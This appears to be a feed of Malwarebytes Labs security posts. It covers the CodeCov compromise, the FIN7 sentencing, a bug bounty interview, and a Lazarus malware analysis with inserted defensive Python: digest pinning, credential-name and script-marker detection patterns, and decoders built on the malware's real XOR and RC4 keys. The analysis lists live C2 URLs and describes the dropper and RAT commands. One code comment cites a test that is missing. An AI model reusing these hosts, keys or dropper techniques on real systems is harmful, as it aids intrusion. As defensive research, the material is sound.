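The two controls that follow from the incident described above are shown here as an added example; this is not CodeCov’s code and the script bodies, digest and environment are all constructed for the demonstration. The first helper pins the SHA-256 of a vetted uploader and refuses to run a fetched copy whose digest differs, which removes the “download and execute whatever the server returned” trust problem. The second lists the environment variables a CI step exposes that look like credentials, which is exactly the set the re-roll advice above is about. The `demo_runner` hook stands in for invoking bash and is hypothetical.

```python
"""Pin-and-verify a CI helper script before execution, and enumerate the
credential-like environment variables such a script could read.

Added example, not CodeCov's code. The uploader bodies, the pinned digest
and the sample environment are constructed for this demonstration."""
import hashlib
import hmac
import re

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def verify_script(script: bytes, pinned_sha256: str) -> bool:
    """True only if the script's digest equals the pinned one.
    hmac.compare_digest keeps the comparison constant-time."""
    return hmac.compare_digest(sha256_hex(script), pinned_sha256.lower())

def guarded_run(script: bytes, pinned_sha256: str, runner) -> str:
    """Run `runner(script)` only after verification; otherwise refuse.
    `runner` is a hypothetical hook standing in for 'bash <script>'."""
    if not verify_script(script, pinned_sha256):
        return "REFUSED: uploader digest does not match the pinned value"
    return runner(script)

# Variable names that usually hold secrets; anything matching would have been
# readable by any script executed in the same CI step.
CREDENTIAL_NAME = re.compile(
    r"(TOKEN|SECRET|PASSWORD|PASSWD|API_KEY|ACCESS_KEY|PRIVATE_KEY|CREDENTIAL)",
    re.IGNORECASE,
)

def credential_like_names(env: dict) -> list:
    """Sorted names of environment variables that look like credentials."""
    return sorted(name for name in env if CREDENTIAL_NAME.search(name))

# Constructed stand-in for a vetted uploader (not the real Bash Uploader).
TRUSTED_UPLOADER = (
    b"#!/bin/bash\n"
    b"# upload the coverage report (constructed placeholder endpoint)\n"
    b"curl -sS -X POST https://coverage.example.invalid/upload -F report=@coverage.xml\n"
)
# In practice the digest is committed to the repository, not computed at run time.
PINNED = sha256_hex(TRUSTED_UPLOADER)

# Constructed tampered variant: any change at all, however small, changes the digest.
TAMPERED_UPLOADER = TRUSTED_UPLOADER + b"echo tampered\n"

def demo_runner(script: bytes) -> str:
    return f"ran {len(script)} bytes"

if __name__ == "__main__":
    print(guarded_run(TRUSTED_UPLOADER, PINNED, demo_runner))
    print(guarded_run(TAMPERED_UPLOADER, PINNED, demo_runner))
    sample_env = {"AWS_SECRET_ACCESS_KEY": "x", "PATH": "/bin", "NPM_TOKEN": "y", "HOME": "/"}
    print(credential_like_names(sample_env))
```

The pinned digest has to live somewhere the fetched script cannot rewrite (the repository itself, or the CI configuration), otherwise the check verifies nothing.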

The post CodeCov supply-chain compromise likened to SolarWinds attack appeared first on Malwarebytes Labs.

FIN7 sysadmin behind “billions in damage” gets 10 years

In 2018 three high-ranking members of a sophisticated international cybercrime group operating out of Eastern Europe were arrested and taken into custody by US authorities. Ukrainian nationals Dmytro Fedorov, Fedir Hladyr, and Andrii Kolpakov, were members of a prolific hacking group widely known as FIN7.

Hladyr is the systems administrator for the FIN7 hacking group, and is considered the mastermind behind the Carbanak campaign, a series of cyberattacks said to have stolen as much as $900 million from banks in the early part of the last decade. Last week Hladyr was sentenced in the Western District of Washington to 10 years in prison for his high-level role in FIN7.

The Carbanak campaign first made international headlines in 2015 as one of the first malware campaigns that specialized in remote ATM robberies. But FIN7 had already been active for a few years at that point and was involved in a lot more banking and financial malware than just ATM manipulation.

The malware

Since 2013 FIN7 have attempted to attack banks, e-payment systems, and financial institutions using pieces of malware they designed, known as Carbanak and Cobalt. Carbanak is considered a further development of the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world.

The campaigns all started with spear-phishing targeted at bank employees. When targets executed a malicious attachment the criminals were able to remotely control the victims’ infected machine. With access to a bank’s internal network, they were able to work their way internally until they gained control of the servers controlling ATMs.

A very detailed analysis of Anunak by Fox-IT and Group-IB can be found here (pdf).

By the following year, the same coders had improved the Anunak malware into a more sophisticated version, known as Carbanak. From then onwards, FIN7 focused its efforts on developing an even more sophisticated wave of attacks by using tailor-made malware based on the Cobalt Strike penetration testing software, but Carbanak remained part of their toolset.

In the US alone, FIN7 successfully breached the computer networks of companies in 47 states and the District of Columbia, stealing more than 15 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations.

Attribution

Many believe that the Carbanak malware was used by at least two separate entities: FIN7 and the Carbanak Group. This can be very confusing when trying to establish a timeline, or when trying to solve any “whodunnit” mysteries. Once malware has been released and has proven to be successful you can count on other criminals trying to steal, copy, or rip off the code and techniques. So, if the Carbanak malware was used in a specific attack, it is not always clear which group was behind that attack, although it is clear that FIN7 was one of its users.

The arrest

The leader of the crime gang behind the Carbanak and Cobalt malware attacks was arrested in Alicante, Spain. The arrest was announced by Europol on 26 March 2018. According to Europol, the activities of the gang were believed to have resulted in losses of over EUR 1 billion for the financial industry.

Arresting the leader of that group did not stop the activities of the group though. The FIN7 campaigns appear to have continued, with the Hudson’s Bay Company breach using point-of-sale malware in April of 2018 being attributed to the group.

The arrest of Hladyr in August of 2018 at the request of the US Department of Justice, along with two other high-ranking members of the group, did not have that effect either. In 2020 cooperation between FIN7 and the Ryuk operators was suspected when the tools and techniques of FIN7, including the Carbanak Remote Administration Tool (RAT), were used to take over the network of an enterprise.

The conviction

After being extradited to the US in 2019, Hladyr pleaded guilty to one count of conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking, in his role as the systems administrator of the FIN7 group.

According to acting US Attorney Tessa M. Gorman of the Western District of Washington:

This criminal organization had more than 70 people organized into business units and teams.  Some were hackers, others developed the malware installed on computers, and still others crafted the malicious emails that duped victims into infecting their company systems. This defendant worked at the intersection of all these activities and thus bears heavy responsibility for billions in damage caused to companies and individual consumers.

The Department of Justice says that Hladyr joined FIN7 via a front company called Combi Security but soon learned that it was a fake cybersecurity company with a phony website and no legitimate customers. It asserts that Hladyr served as FIN7’s systems administrator and played a central role in aggregating stolen payment card information, supervising FIN7’s hackers, and maintaining the servers used to attack and control victims’ computers. Hladyr also controlled the organization’s encrypted channels of communication.

The post FIN7 sysadmin behind “billions in damage” gets 10 years appeared first on Malwarebytes Labs.

Interview with a bug bounty hunter: Youssef Sammouda

Behind the scenes there are many people working in cyber-security that make the internet a safer place. Youssef Sammouda is one of these people. He has submitted at least a hundred reports to Facebook which have been resolved, making Facebook a safer platform along the way. Generally speaking, people may refer to this work as being a bug bounty hunter, but there is more to it than that.

Q: Tell us a little bit about your background

A: I’m 21 years old. I grew up in Tunisia. I always loved everything about computers from an early age. I started programming when I was 12 and my curiosity eventually led me to hacking. First I learned about “hacking”, techniques to get access to systems, how to escalate privileges, and how to achieve persistence. A better name than hacking is penetration testing. After that, I focused on web application security and learned a lot from forums and IRC chat rooms. Later, I heard about bug bounty hunting by coincidence and started doing it.

I can’t say much about my educational background since I dropped out of university due to my engagements in web applications development and my security assessments. I’d say that everything I learned to this day was from online content or books and not from educational institutions.

Q: How did you get interested in bug bounties?

A: Before bug bounties, it was difficult to test what you learned or sharpen your skills without being worried about getting noticed or caught when targeting websites or servers, since after all you’re doing something without the owner’s permission even if your intention is not to cause damage. So, the first benefit of bug bounty programs was the ability to responsibly apply or test what you’d learned about security, without worrying about legal actions by the website owners. Then of course, some of the programs introduced financial rewards which made it even better. You could start earning money at the same time as learning and doing what you love.

I became interested in the Facebook bug bounty program because it was beginner friendly. The scope was huge and it had the biggest rewards. My first bug in Facebook was a critical one and I found it in less than an hour, which encouraged me to dig more and learn about their infrastructure. After some time, I found myself knowing all the techniques to best enumerate their websites.

Q: Are there other security fields you are interested in?

A: I’ve always been fascinated by browser security and Operating System (OS) security. Reading proof-of-concept exploits of vulnerabilities found in browsers or applications has always been fun and an enjoyable thing to do, and I hope one day I can achieve the level of the researchers in these fields.

Q: Can you tell us something about how you find new bugs? And why you focus on Facebook?

A: I believe Facebook is running one of the best bug bounty programs out there. Sure, it has some problems and sometimes you get misunderstood by the security team, but if you compare it to other bug bounty programs, you’ll notice that Facebook is way better. Also, Facebook is very serious about its security. With time you notice that it’s getting harder to find bugs, which motivates me more, since I know others might be quitting and leaving me with a big scoop to dig out.

Due to the large numbers of researchers/hunters nowadays, and the continuous competition between us, I always try to follow my own methodology—which is different from others’—to avoid duplicated reports, and also to find special bugs that others have missed. Of course, over time, I have to change my methodology to stay in the game: Other researchers discover similar methodologies to mine, the security team adapt and make enumeration harder, and so on.

Q: Do you get a ton of requests to hack people’s Facebook accounts?

A: Actually, I don’t remember receiving requests to hack someone’s Facebook account, but I get requests to verify profiles or pages. I always try to gently explain that I don’t work for Facebook. I redirect them to the right Facebook support or contact page for their needs.

Q: What is the most potentially dangerous discovery you have made?

A: I believe the most dangerous discovery I have found was a Facebook bug that allowed me to return data fragments of any object. This data extraction bug was similar to finding an SQL injection bug, which is rare to find in modern applications. This could have allowed a malicious actor to collect a large amount of data about Facebook infrastructure, users and more.

Q: What advice do you have for aspiring bug bounty hunters?

A: I have always believed that there’s no such thing as a “bug bounty hunter”. There are security experts or researchers. “Bug bounty hunter” tells newcomers, or other experts in the field, that it’s all about bounties for us: How to earn them and what’s the fastest route to do that. Which is clearly wrong, since one must first understand what cybersecurity is and what problems we’re trying to address and fix.

The best advice for people trying to start is to first master a programming language. Then learn about security in a field you like (web, OS, mobile …) and how to write secure code. When learning about security, try to write vulnerable applications that you can exploit, so you can test what you learned against them. If you can understand how a vulnerability occurs in your application, you might try to apply what you learned against real applications, like the ones run by websites with a bug bounty program.

Do not care about bounties to begin with, just about finding bugs. You might report them without even waiting for the security team to reply. At some point, you’ll reach a certain level, with skills and experience gained over years, that will enable you to start making money from it, or by starting a professional career.

We would like to thank Youssef for his cooperation. You can follow Youssef Sammouda on Twitter.

The post Interview with a bug bounty hunter: Youssef Sammouda appeared first on Malwarebytes Labs.

Lazarus APT conceals malicious code within BMP image to drop its RAT

This blog was authored by Hossein Jazi

Lazarus APT is one of the most sophisticated North Korean Threat Actors that has been active since at least 2009. This actor is known to target the U.S., South Korea, Japan and several other countries. In one of their most recent campaigns Lazarus used a complex targeted phishing attack against security researchers.

Lazarus is known to employ new techniques and custom toolsets in its operations to increase the effectiveness of its attacks. On April 13, we identified a document used by this actor to target South Korea. In this campaign, Lazarus resorted to an interesting technique of BMP files embedded with malicious HTA objects to drop its Loader.

Process Graph

This attack likely started by distributing phishing emails that were weaponized with a malicious document. The following figure shows the overall process of this attack. In the next sections, we provide the detailed analysis of this process.

Figure 1: Process graph

Document Analysis

Opening the document shows a blue theme in Korean that asks the user to enable the macro to view the document.

Figure 2: Blue theme

Upon enabling the macro, a message box pops up, and after the user clicks it the final lure is loaded.

Figure 3: Lure form

The document name is in Korean “참가신청서양식.doc” and it is a participation application form for a fair in one of the South Korean cities. The document creation time is 31 March 2021 which indicates that the attack happened around the same time.

The document has been weaponized with a macro that is executed upon opening.

Figure 4: Macro

The macro starts by calling MsgBoxOKCancel function. This function pops up a message box to the user with a message claiming to be an older version of Microsoft Office. After showing the message box, it performs the following steps:

Figure 5: Document_Open
  • Defines the required variables, such as the WMI object, Mshta and the file extension, in base64 format and then calls the Decode function to base64-decode them.
  • Gets the active document name and separates the name from the extension.
  • Creates a copy of the active document in HTML format using ActiveDocument.SaveAs with wdFormatHTML as the parameter. Saving the document as HTML stores all the images within the document in a FILENAME_files directory.
Figure 6: SaveAs HTML
  • Calls the show function to make the document protected. A protected document ensures that users cannot make any changes to it.
Figure 7: Protect the document
  • Gets the image file that has an embedded zlib object (image003.png).
  • Converts the image from PNG format into BMP format by calling WIA_ConvertImage. Since BMP is an uncompressed graphics file format, converting the PNG into BMP automatically decompresses the malicious zlib object embedded in the PNG. This is a clever method used by the actor to bypass security mechanisms that can detect embedded objects within images: the document contains a PNG image holding a zlib-compressed malicious object, and because it is compressed it cannot be detected by static detections. The threat actor then used a simple conversion to decompress the malicious content.
Figure 8: Embedded objects within PNG and BMP file
Figure 9: Embedded HTA file within BMP
  • Gets a WMI object to call Mshta to execute the BMP file. After decompression the BMP file contains an HTA file which executes JavaScript to drop a payload.
  • Deletes all the images in the directory and then removes the directory generated by the SaveAs function.
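The defensive counterpart to the PNG-to-BMP trick described in the steps above, as an added example that is not part of the original analysis: rather than trusting that an image is inert because its embedded object is compressed, scan the file’s bytes for zlib stream headers, try to inflate each one, and flag any stream that inflates to script-like content. The PNG-like sample and the HTA stub it carries are constructed for this demonstration; a real PNG’s own IDAT chunks will also inflate, but to pixel data, so they are not flagged.

```python
"""Scan an image's bytes for embedded zlib streams and report which of them
inflate to script-like content.

Added example, not from the original analysis. SAMPLE_IMAGE is constructed:
a PNG signature, padding, then a zlib-compressed HTA stub."""
import re
import zlib

# CMF/FLG byte pairs of a zlib header for the standard 32K window (the
# four common compression-level variants); each satisfies (CMF*256+FLG) % 31 == 0.
ZLIB_HEADERS = (b"\x78\x01", b"\x78\x5e", b"\x78\x9c", b"\x78\xda")
SCRIPT_MARKERS = re.compile(rb"<script|<hta:application|WScript|ActiveXObject", re.IGNORECASE)

def find_zlib_streams(data: bytes, min_len: int = 16) -> list:
    """Return (offset, inflated_bytes) for every position where a zlib header
    appears and a complete stream inflates from it."""
    found = []
    for header in ZLIB_HEADERS:
        start = 0
        while (off := data.find(header, start)) != -1:
            d = zlib.decompressobj()
            try:
                out = d.decompress(data[off:])
                # d.eof means a whole stream (with valid Adler-32) ended here
                if d.eof and len(out) >= min_len:
                    found.append((off, out))
            except zlib.error:
                pass  # header bytes that were not really a stream
            start = off + 1
    return sorted(found)

def suspicious_streams(data: bytes) -> list:
    """Offsets of inflated streams whose content looks like script."""
    return [off for off, out in find_zlib_streams(data) if SCRIPT_MARKERS.search(out)]

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Constructed, harmless stub; it is not the HTA from the campaign.
STUB_HTA = b"<html><head><hta:application id='x'/></head><script>/* constructed stub */</script></html>"
SAMPLE_IMAGE = PNG_SIGNATURE + b"\x00" * 64 + zlib.compress(STUB_HTA) + b"\x00" * 16

if __name__ == "__main__":
    for off, out in find_zlib_streams(SAMPLE_IMAGE):
        print(f"zlib stream at offset {off}: {len(out)} bytes inflated")
    print("suspicious offsets:", suspicious_streams(SAMPLE_IMAGE))
```

Requiring `d.eof` (a complete stream with a valid trailing checksum) is what keeps the scan from flagging random byte pairs that happen to look like a header; an image carrying the conversion trick has to contain a complete stream, otherwise the conversion would not yield a usable file.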

BMP file analysis (image003.zip)

The macro added the extension zip to the BMP file during the image conversion process to pretend it’s a zip file. This BMP file has an embedded HTA file. The HTA contains JavaScript that creates “AppStore.exe” as “C:\Users\Public\Libraries\AppStore.exe” and then populates its content.

At the start, it defines an array that contains the list of the functions and parameters required by the script: OpenTextFile, CreateTextFile, Close, Write, FromCharCode, “C:/Users/Public/Libraries/AppStore.exe” and some junk values. When the script wants to perform an action, it calls a second function with a hex value that is responsible for building an index to retrieve the required value from the first array.

For example, at the first step it calls the second function with the value 0x1dd. This function subtracts 0x1dc from 0x1dd to get the index into the first array, which would be 1. It then uses this index to retrieve the first element of the first array, which would be “C:/Users/Public/Libraries/AppStore.exe”. Following the same process, it calls CreateTextFile to create AppStore.exe and then writes MZ into it. Then it converts data in decimal format to a string by calling the fromCharCode function and, using the same procedure, writes it into AppStore.exe. At the end it calls Wscript.Run to execute the dropped payload.

Figure 10: Embedded HTA object

Payload analysis (AppStore.exe)

AppStore.exe loads a base64-encoded, encrypted payload that has been appended to the end of itself. Before the payload there is a string which is the decryption key (by7mJSoKVDaWg*Ub).

Figure 11: Embedded payload

To decrypt the second stage payload, at first it writes itself into a buffer created by VirtualAlloc and then looks for the encrypted payload and copies it into another buffer.

Figure 12: Allocate memory

In the next step, it uses its own base64 decoder to decode the allocated buffer and writes the result into another buffer using memset and memmove. Finally, this decoded payload is decrypted via XOR with the hardcoded decryption key to produce the second stage payload.

Figure 13: XOR decryption

After the decryption process has finished, it jumps to the start address of the second payload to execute it.
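The recovery procedure described above, reproduced as an added example on a constructed sample (this is not the malware’s code): locate the hardcoded key string inside the loader image, treat everything after it as base64, decode it, and XOR the result with the key. Two details the analysis leaves open are taken as assumptions here: that the XOR key repeats over the payload, and that the base64 blob begins immediately after the key. The fake PE bytes and the inner payload are constructed.

```python
"""Extract and decrypt a payload appended to a loader in the layout described
above: <loader bytes><key><base64(XOR(payload, key))>.

Added example, not the malware's code. Repeating-key XOR and the key-then-
payload adjacency are assumptions; the loader image is constructed."""
import base64

KEY = b"by7mJSoKVDaWg*Ub"  # key string reported in the analysis

def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (assumption: the key cycles over the payload)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def extract_second_stage(loader_image: bytes, key: bytes = KEY) -> bytes:
    """Find the key marker, base64-decode the trailing blob, XOR-decrypt it."""
    # '*' in the key is outside the base64 alphabet, so the marker cannot
    # collide with the encoded tail that follows it.
    idx = loader_image.find(key)
    if idx == -1:
        raise ValueError("key marker not found in loader image")
    blob = loader_image[idx + len(key):].strip()
    encrypted = base64.b64decode(blob, validate=True)
    return xor_with_key(encrypted, key)

def build_sample_loader(stage2: bytes, key: bytes = KEY) -> bytes:
    """Constructed stand-in for AppStore.exe: fake PE-ish header, then the
    key, then the base64(XOR(payload)) tail. Used only to make test input."""
    fake_pe = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 40
    return fake_pe + key + base64.b64encode(xor_with_key(stage2, key))

# Constructed second-stage bytes; not real shellcode.
CONSTRUCTED_STAGE2 = b"\x55\x8b\xec" + b"constructed second-stage bytes" + b"\xc3"
SAMPLE_LOADER = build_sample_loader(CONSTRUCTED_STAGE2)

if __name__ == "__main__":
    recovered = extract_second_stage(SAMPLE_LOADER)
    print("recovered", len(recovered), "bytes; matches:", recovered == CONSTRUCTED_STAGE2)
```

On a real sample the same steps apply to the file on disk, which is why the key string is worth a detection signature on its own: it sits in the clear in front of the encoded tail.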

Second stage payload Analysis

This payload is loaded into memory by AppStore.exe and has not been written to disk. It starts by performing an initialization process which includes the following steps:

Figure 14: Initialization process
  • Create mutex: Checks whether a mutex named “Microsoft32” exists on the machine; if it does, the payload exits. Otherwise the machine has not yet been infected with this RAT and it starts its malicious activities.
  • Resolve API calls: All important API calls have been base64 encoded and RC4 encrypted which will be decoded and decrypted at run time. The key for RC4 decryption is “MicrosoftCorporationValidation@#$%^&*()!US”.
Figure 15: API resolver
  • Makes HTTP requests to command and control servers: The server addresses have been base64 encoded and encrypted using a custom encryption algorithm. You can find the decoder/decryptor here. This custom encryption algorithm is similar to the one used by the BISTROMATH RAT associated with Lazarus, as reported by US-CERT.
Figure 16: Custom decryption algorithm

http://mail.namusoft.kr/jsp/user/eam/board.jsp
http://www.jinjinpig.co.kr/Anyboard/skin/board.php
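The API-name protection described in the initialization steps above (base64, then RC4 with the reported key) as an added example, not Lazarus code: a plain RC4 routine and a decoder that undoes both layers. The encoded table is generated inside the block from constructed plaintext, since the real encoded strings are not reproduced on the page; the assumption is standard RC4 applied to the base64-decoded bytes.

```python
"""Undo base64 + RC4 string protection with the key reported in the analysis.

Added example, not the malware's code. CONSTRUCTED_TABLE is built here from
plain API names rather than taken from the sample."""
import base64

RC4_KEY = b"MicrosoftCorporationValidation@#$%^&*()!US"  # key reported in the analysis

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling then keystream generation. Encryption and
    decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def protect_string(plain: str, key: bytes = RC4_KEY) -> str:
    """Forward direction (RC4 then base64); used only to build test material."""
    return base64.b64encode(rc4(key, plain.encode())).decode()

def decode_api_name(encoded: str, key: bytes = RC4_KEY) -> str:
    """Reverse direction: base64-decode, then RC4 with the key."""
    return rc4(key, base64.b64decode(encoded)).decode()

def resolve_table(table, key: bytes = RC4_KEY) -> list:
    """Decode every entry of an encoded API-name table."""
    return [decode_api_name(e, key) for e in table]

# Constructed: the API names the analysis mentions, protected the same way.
API_NAMES = ["CreateThread", "CreatePipe", "CreateProcessA", "ReadFile", "WinExec"]
CONSTRUCTED_TABLE = [protect_string(n) for n in API_NAMES]

if __name__ == "__main__":
    for enc, name in zip(CONSTRUCTED_TABLE, resolve_table(CONSTRUCTED_TABLE)):
        print(f"{enc:32} -> {name}")
```

Because RC4 is symmetric, the same `rc4` call serves both directions; the `rc4(b"Key", b"Plaintext")` test below is the standard published RC4 test vector and checks the routine independently of the page’s key.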

After the initialization process has finished, it checks if the communications to C&C servers were successful or not and if they were successful it goes to the next step in which it receives the commands from the server and performs different actions based on the commands.

The commands received from the C&C are base64 encoded and encrypted using its custom encryption algorithm (Figure 16). After deobfuscation, it performs the following commands based on the command codes. The communications to the server have been done through send and recv socket functions.

  • 8888: It tries to execute the command it has received after the command code in two different ways. At first it tries to execute the command by creating a new thread (Figure 17). This thread takes the command after the command code and executes it using cmd.exe, via CreatePipe and CreateProcessA. It then uses ReadFile to read the output of cmd.exe.
Figure 17: Create thread

The output of cmd.exe is encoded and encrypted and sent to the server as test.gif using an HTTP POST request (Figure 18).

Figure 18: Send the output of cmd.exe as test.gif

If the CreateThread process was not successful, it executes the command by calling WinExec and then sends the “8888 Success!” message to the server as test.gif, after encrypting it using its custom encryption and then encoding it using base64.

Figure 19: WinExec
  • 1234: It calls CreateThread to execute the buffer (third stage payload) it received from the server. At the end it encodes and encrypts “1234 Success!” and sends it to the server as test.gif.
  • 2099: It creates a batch file, executes it and then exits. This batch file deletes AppStore.exe from the victim’s machine.
Figure 20: Creates batch file
  • 8877: It stores the buffer received from the server in a file.
  • 1111: It calls the shutdown function to disable sends or receives on the socket.

This second stage payload has used custom encoded user agents for its communications. All of these user agents have been base64 encoded and encrypted using the same custom encryption algorithm used to encrypt the server addresses. Here is the list of the different user agents used by this RAT.

Mozilla/%d.0  (compatible; MSIE %d.0; Windows NT %d.%d; WOW64; Trident/%d.0; Infopath.%d)

Mozilla/18463680.0  (compatible; MSIE -641.0; Windows NT 1617946400.-858993460; WOW64; Trident/-858993460.0; Infopath.-858993460)

Mozilla/18463680.0  (compatible; MSIE -641.0; Windows NT 1617946400.-858993460; Trident/-858993460.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Infopath.-858993460)

Mozilla/%d.0  (Windows NT %d.%d%s) AppleWebKit/537.%d (KHTML, like Gecko) Chrome/%d.0.%d.%d Safari/%d.%d Infopath.%d
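The user-agent strings listed above are themselves a detection opportunity: a real Internet Explorer or Chrome user agent never carries negative or nine-digit version numbers. As an added example that is not part of the original analysis, the classifier below parses constructed proxy log lines, flags user agents with malformed version components, and raises the severity when the same request is a POST whose URL names test.gif. The log format, hostnames and the assumption that the filename appears in the request URL are all constructed for the demonstration.

```python
"""Flag proxy log lines whose User-Agent carries malformed version numbers,
and rate POSTs of "test.gif" under such a UA as high severity.

Added example, not from the original analysis. The log lines, the log
format and the host names are constructed."""
import re

# Version components in genuine IE/Chrome UAs are small non-negative integers.
NEGATIVE_VERSION = re.compile(r"(?:MSIE|Windows NT|Trident/|Infopath\.|Chrome/)\s*-\d+")
HUGE_VERSION = re.compile(r"Mozilla/(\d{4,})\.0")  # e.g. Mozilla/18463680.0

# Constructed format: <timestamp> <src-ip> <method> <url> <status> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

def parse(line: str):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def ua_is_malformed(ua: str) -> bool:
    """True when any version component is negative or absurdly large."""
    return bool(NEGATIVE_VERSION.search(ua) or HUGE_VERSION.search(ua))

def classify(line: str) -> str:
    """'high' for malformed UA plus POST of test.gif, 'medium' for either
    indicator alone, 'none' otherwise, 'unparsed' if the line does not parse."""
    rec = parse(line)
    if rec is None:
        return "unparsed"
    bad_ua = ua_is_malformed(rec["ua"])
    gif_post = rec["method"] == "POST" and rec["url"].lower().endswith("test.gif")
    if bad_ua and gif_post:
        return "high"
    if bad_ua or gif_post:
        return "medium"
    return "none"

# Constructed sample lines; the second reuses one of the UA strings listed above.
CONSTRUCTED_LOGS = [
    '2021-04-13T10:00:01Z 10.0.0.5 GET http://intranet.example.invalid/index.html 200 '
    '"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"',
    '2021-04-13T10:00:07Z 10.0.0.5 POST http://c2.example.invalid/board.php/test.gif 200 '
    '"Mozilla/18463680.0  (compatible; MSIE -641.0; Windows NT 1617946400.-858993460; '
    'WOW64; Trident/-858993460.0; Infopath.-858993460)"',
    '2021-04-13T10:00:09Z 10.0.0.6 POST http://cdn.example.invalid/upload 200 '
    '"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"',
    '2021-04-13T10:00:12Z 10.0.0.7 GET http://cdn.example.invalid/test.gif 200 '
    '"Mozilla/5.0 (Windows NT 6.1; Trident/-858993460.0)"',
]

if __name__ == "__main__":
    for line in CONSTRUCTED_LOGS:
        print(classify(line), "|", line[:70])
```

The recurring value -858993460 is what 0xCCCCCCCC reads as when printed as a signed 32-bit integer, the byte pattern MSVC debug builds use to fill uninitialized stack memory; that makes the exact string a stable indicator, but the regexes above match the shape (a negative version number) rather than the value, so they also catch variants built with different junk.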

Attribution

There are several similarities between this attack and past Lazarus operations and we believe these are strong indicators to attribute this attack to the Lazarus threat actor.

  • The second stage payload uses a custom encryption algorithm similar to the one used by the BISTROMATH RAT associated with this APT.
  • The second stage payload uses a combination of base64 and RC4 for data obfuscation, which is a common technique used by this APT.
  • The second stage payload used in this attack has some code similarities with known Lazarus malware families, including Destover.
  • Sending data and messages as a GIF to a server has been observed in past Lazarus operations including AppleJeus, Supply Chain attack against South Korea and the DreamJob operation.
  • This phishing attack has targeted South Korea which is one of the main targets of this actor.
  • The group is known to use Mshta.exe to run malicious scripts and download programs which is similar to what has been used in this attack.

Conclusion

The Lazarus threat actor is one of the most active and sophisticated North Korean threat actors that has targeted several countries including South Korea, the U.S. and Japan in the past couple of years. The group is known to develop custom malware families and use new techniques in its operations. In this blog we documented a spear phishing attack operated by this APT group that has targeted South Korea.

The actor used a clever method to bypass security mechanisms: it embedded its malicious HTA file as a zlib-compressed object within a PNG file, which is decompressed at run time by converting the image to BMP format. The dropped payload was a loader that decoded and decrypted the second stage payload into memory. The second stage payload has the capability to receive and execute commands and shellcode as well as to perform exfiltration and communicate with a command and control server.


Indicators of Compromise

Document

F1EED93E555A0A33C7FEF74084A6F8D06A92079E9F57114F523353D877226D72

Dropped executable

ED5FBEFD61A72EC9F8A5EBD7FA7BCD632EC55F04BDD4A4E24686EDCCB0268E05

Command and control servers

jinjinpig[.]co[.]kr
mail[.]namusoft[.]kr

The post Lazarus APT conceals malicious code within BMP image to drop its RAT appeared first on Malwarebytes Labs.